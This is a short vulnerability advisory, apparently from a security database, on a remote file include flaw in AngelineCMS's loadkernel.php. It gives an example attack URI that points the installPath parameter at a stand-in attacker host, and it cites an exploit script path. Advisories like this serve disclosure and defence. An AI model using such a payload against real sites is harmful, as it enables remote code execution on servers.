AngelineCMS Loadkernel.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

AngelineCMS Loadkernel.PHP Remote File Include Vulnerability

This issue can be exploited through a web client.

An example URI has been provided:

http://www.example.com/[angelinecms_path]/kernel/loadkernel.php?installPath=http://www.example.com/evil?

The following exploit is available:

/data/vulnerabilities/exploits/angelineCMS.pl